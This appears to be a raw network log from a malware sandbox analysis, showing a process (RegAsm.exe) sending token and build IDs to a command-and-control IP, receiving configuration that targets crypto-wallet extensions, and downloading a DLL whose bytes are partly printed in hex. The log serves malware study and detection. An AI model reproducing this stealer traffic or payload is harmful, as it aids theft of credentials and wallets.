                                                                                                                                                      2024-10-03 07:16:12 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 42 41 4b 46 43 46 48 43 47 44 47 43 42 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 33 39 62 37 36 30 32 63 65 66 34 65 36 31 30 66 39 32 35 31 38 38 37 63 39 61 38 34 66 39 31 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 41 4b 46 43 46 48 43 47 44 47 43 42 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 41 4b 46 43 46 48 43 47 44 47 43 42 41 41 4b 46 0d 0a 43 6f 6e 74
                                                                                                                                                      Data Ascii: ------BGDBAKFCFHCGDGCBAAKFContent-Disposition: form-data; name="token"039b7602cef4e610f9251887c9a84f91------BGDBAKFCFHCGDGCBAAKFContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------BGDBAKFCFHCGDGCBAAKFCont
                                                                                                                                                      2024-10-03 07:16:13 UTC158INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:13 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-10-03 07:16:13 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                      Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      5192.168.2.64972549.12.197.94436880C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:14 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----AAKKFHCFIECAAAKEGCFI
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Content-Length: 332
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-10-03 07:16:14 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 33 39 62 37 36 30 32 63 65 66 34 65 36 31 30 66 39 32 35 31 38 38 37 63 39 61 38 34 66 39 31 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 0d 0a 43 6f 6e 74
                                                                                                                                                      Data Ascii: ------AAKKFHCFIECAAAKEGCFIContent-Disposition: form-data; name="token"039b7602cef4e610f9251887c9a84f91------AAKKFHCFIECAAAKEGCFIContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------AAKKFHCFIECAAAKEGCFICont
                                                                                                                                                      2024-10-03 07:16:15 UTC158INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:14 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-10-03 07:16:15 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      6192.168.2.64972649.12.197.94436880C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:15 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----HJJJDAEGIDHCBFHJJJEG
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Content-Length: 5669
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-10-03 07:16:15 UTC5669OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 33 39 62 37 36 30 32 63 65 66 34 65 36 31 30 66 39 32 35 31 38 38 37 63 39 61 38 34 66 39 31 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74
                                                                                                                                                      Data Ascii: ------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="token"039b7602cef4e610f9251887c9a84f91------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------HJJJDAEGIDHCBFHJJJEGCont
                                                                                                                                                      2024-10-03 07:16:16 UTC158INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:16 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-10-03 07:16:16 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      7192.168.2.64972749.12.197.94436880C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:16 UTC192OUTGET /sqlp.dll HTTP/1.1
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-10-03 07:16:17 UTC263INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:16 GMT
                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                      Content-Length: 2459136
                                                                                                                                                      Connection: close
                                                                                                                                                      Last-Modified: Thursday, 03-Oct-2024 07:16:16 GMT
                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-10-03 07:16:17 UTC16121INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                                                                                      2024-10-03 07:16:17 UTC16384INData Raw: b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                      Data Ascii: %:X~e!*FW|>|L1146
                                                                                                                                                      2024-10-03 07:16:17 UTC16384INData Raw: 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56
                                                                                                                                                      Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
                                                                                                                                                      2024-10-03 07:16:17 UTC16384INData Raw: f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89
                                                                                                                                                      Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5
                                                                                                                                                      2024-10-03 07:16:17 UTC16384INData Raw: 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f
                                                                                                                                                      Data Ascii: L$ D$$;|D$;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|
                                                                                                                                                      2024-10-03 07:16:17 UTC16384INData Raw: 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                      Data Ascii: |$2@3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                                                                      2024-10-03 07:16:17 UTC16384INData Raw: 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                      Data Ascii: td|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                                                                      2024-10-03 07:16:17 UTC16384INData Raw: ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3
                                                                                                                                                      Data Ascii: _^][YVt$W|$FVBhtw7t7Vg_^jjjh,g!t$
                                                                                                                                                      2024-10-03 07:16:17 UTC16384INData Raw: 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3
                                                                                                                                                      Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
                                                                                                                                                      2024-10-03 07:16:17 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81
                                                                                                                                                      Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      8192.168.2.64972849.12.197.94436880C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:19 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----JDGHIIJKEBGIDHIDBKJD
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Content-Length: 829
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-10-03 07:16:19 UTC829OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 48 49 49 4a 4b 45 42 47 49 44 48 49 44 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 33 39 62 37 36 30 32 63 65 66 34 65 36 31 30 66 39 32 35 31 38 38 37 63 39 61 38 34 66 39 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 48 49 49 4a 4b 45 42 47 49 44 48 49 44 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 48 49 49 4a 4b 45 42 47 49 44 48 49 44 42 4b 4a 44 0d 0a 43 6f 6e 74
                                                                                                                                                      Data Ascii: ------JDGHIIJKEBGIDHIDBKJDContent-Disposition: form-data; name="token"039b7602cef4e610f9251887c9a84f91------JDGHIIJKEBGIDHIDBKJDContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------JDGHIIJKEBGIDHIDBKJDCont
                                                                                                                                                      2024-10-03 07:16:20 UTC158INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:20 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-10-03 07:16:20 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      9192.168.2.64972949.12.197.94436880C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:20 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----HJJJDAEGIDHCBFHJJJEG
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Content-Length: 437
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-10-03 07:16:20 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 33 39 62 37 36 30 32 63 65 66 34 65 36 31 30 66 39 32 35 31 38 38 37 63 39 61 38 34 66 39 31 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74
